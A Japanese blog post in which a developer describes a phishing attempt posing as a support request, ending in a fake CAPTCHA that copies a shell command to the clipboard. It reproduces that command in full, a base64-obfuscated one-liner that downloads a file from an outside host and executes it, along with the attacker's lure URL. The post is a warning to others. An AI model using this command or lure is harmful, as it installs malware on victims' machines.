ユーザサポートの問い合わせを装った攻撃が怖すぎた
どうもTAKUYAです。個人開発をしていてアプリの知名度が上がってくると、作者個人(あるいはサイト管理人)を狙った攻撃というのをたまに受けます。つい先日も、怖すぎるメールを受け取ったのでシェアします。
件名: Cookie consent prevents platform access
Hello,
I cannot access use the store.
The cookie consent notice keeps appearing and nothing happens once I approve or try to close it, so I’m unable to
interact with the website.
Please provide guidance on how to resolve this or provide an alternative solution so I can access?日本語で要約すると、「クッキー承諾がアクセスを妨害していて使えない」という感じの旨の問い合わせです。この時点ですでに奇妙です。なぜなら僕のアプリのサイト https://www.inkdrop.app/ は、クッキー収集の許諾ダイアログを表示していません。広告用途のトラッキングをしていないからです。少し怪しみつつも次のように返信します:
Can you tell me which Url, your OS, and browser?
Kind regards,
Takuyaどのページなのかと、環境について訪ねました。すると次のように返信がありました。ちなみにこの返信メールはGmailでスパムフォルダに仕分けられていました。
Hey,
Thanks for your previous guidance.
I'm still having trouble with access using the latest version of Firefox on Windows
It's difficult to describe the problem so I've included a screenshot.
https://sites.google.com/view/drive-845fro3buhxi/screen?fileid=15034204
Please take a look and suggest the next steps.返答内容は自然に見えます。しかしどのページかは答えてくれませんでした。代わりに、「スクショを貼ったぞ」と言ってURLが貼られています。Google SitesのURLのようですが、自分はGoogle DriveのURLと誤認してしまいました。クリックします(あなたは決してしないで下さい!)。
なぜかCaptchaが表示されました。クリックします。
なんか「確認のためのステップ」が表示されました。「Terminalを立ち上げてペーストして実行せよ」みたいに言っています。この時点で「あーPhisingだ」と気づきました。クリップボードには以下のシェルスクリプトがコピーされていました:
echo -n Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHBzOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRjaGE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakttTVVGRVl2OEFsZktS | base64 -d | bashくれぐれも手元のターミナルで実行しないようにして下さい。おそらく、Captchaのチェックボックスのクリックイベント時にコピーしたのでしょう。このスクリプトをChatGPTに分析させました:
シェルスクリプトをリモートからダウンロードして実行するようです。怖い!
Gmailでスパムフォルダに振り分けられていた点からして、既に被害が報告されたURLだったのでしょう。しかし初回コンタクトのメールは振り分けられていなかったので、「誤検知かもしれない」と思ってしまいました。
AIを使った荒らしやフィッシングが増えた
自分のユーザフォーラムでも、AIを使った一見自然に見える投稿が散見されるようになりました。投稿者の目的は明らかではありませんが、概ね嫌がらせやいたずらのように見えます。
メールでの問い合わせを装ったフィッシングも、本当に自然に見えるので、慎重に判断しないと分かりづらくなっています。よく考えれば論点がズレていたり、全体的に奇妙だったりします。嫌だなー。
みなさんも気をつけましょう!
